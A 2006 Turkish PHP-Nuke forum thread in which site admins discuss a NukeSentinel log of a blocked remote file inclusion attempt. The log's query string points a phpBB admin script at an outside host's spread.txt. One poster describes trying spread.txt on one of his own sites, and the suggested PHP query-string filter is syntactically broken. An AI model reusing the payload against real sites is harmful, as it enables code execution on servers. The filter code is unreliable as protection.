Kayıt: Aug 31, 2003 Mesajlar: 234 Konum: Kırklareli
Tarih: 2006-10-15, 01:15:23 Mesaj konusu:
NukeSentinel Kaydı
Date & Time: 2006-10-15 00:43:17
Blocked IP: 200.47.78.40
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: libwww-perl
--------------------
User Agent: libwww-perl/5.65
Query String: www.xxxxxxx.xxx/modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.yagenoysentoplesen.com/spread.txt?
Forwarded For: none
Client IP: none
Remote Address: 200.47.78.40
Remote Port: 57803
Request Method: GET
--------------------
Who-Is for IP
200.47.78.40
OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY
NetRange: 200.0.0.0 - 200.255.255.255
CIDR: 200.0.0.0/8
NetName: LACNIC-200
NetHandle: NET-200-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
NameServer: NS2.DNS.BR
NameServer: NS1.AFRINIC.NET
Comment: This IP address range is under LACNIC responsibility for further
Comment: allocations to users in LACNIC region.
Comment: Please see http://www.lacnic.net/ for further details, or check the
Comment: WHOIS server located at whois.lacnic.net
RegDate: 2002-07-27
Updated: 2005-12-05
OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Whois Info
OrgTechPhone:
OrgTechEmail: whois-contact@lacnic.net
En son mutluedin tarafından 2006-10-15, 01:21:56 tarihinde değiştirildi, toplam 1 kere değiştirildi
üst sürümlerde zaten çalışmıyor ancak bunun en iyi koruması forum/admin klasörüne şifre koymak. cpanel ve pleskpanelden yapıylaibliyor. htaccess lede yapılabilir
İlgili bahsedilen saldırının ne gibi zararları vardır
Ben bu spread.txt yi kendi siteme yükleyip başka bir sitemde denedim gerçi ulaşılamayan sayfa çıktı ama bir ayrıntıyı gözden kaçırdığımı fark ettim
spread.txt içindeki "yagenoysentoplesen.com" değiştirmedim herhangi bir zararı olmuşmudur
(v.7.9)
Saygılar
En üstteki Verdiğin çift gg ile c o o k i e çalmaya çalışıyorlar diğeri local exploit dikkat et
sana zamanında uyarı yaptım ama dinlemiyorsunki kardeş
hostcunla görüş hostta ciddi açık var
Muhtemelen safe mod off //
safe_mode off fazla birşey ifade etmiyor önemli olan tehlikeli komutların php sisteminde disable_functions ile devre dışı bırakılmasıdır...
asp de php de bir sistemi tamaen kontrol etmeye yarayan komutları barındırmaktadır bunların tehlike arz edenlerini devre dışı bırakmadıkça problem olmaya devam edecektir...
Kayıt: Mar 18, 2005 Mesajlar: 2176 Konum: istanbul-tokat
Tarih: 2006-10-28, 17:00:18 Mesaj konusu:
seyranlının söylediği gibi forum/admin şifrelenmeli yada
$_SERVER[query_string] deki veri kontrol edilip http:// , ftp:// gibi bir şey görürse
kodların çalışması die("güvenlik"); ve ya exit; gibi şekilde kodların çalışması engelleyebilirsiniz şöyle mesala
if ($_SERVER[query_string=="http://") { die("güvenlik engeli"); } gibi bir kod la mainfile.php den header.php den engellenebilir xss
ve ya bu tarz dizilerin hepsi bir array da toplanır sonra in_array fonksiyonu ile array da arama yaptırılıp yine " güvenlik engeli " ekrana göstertileiblir
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız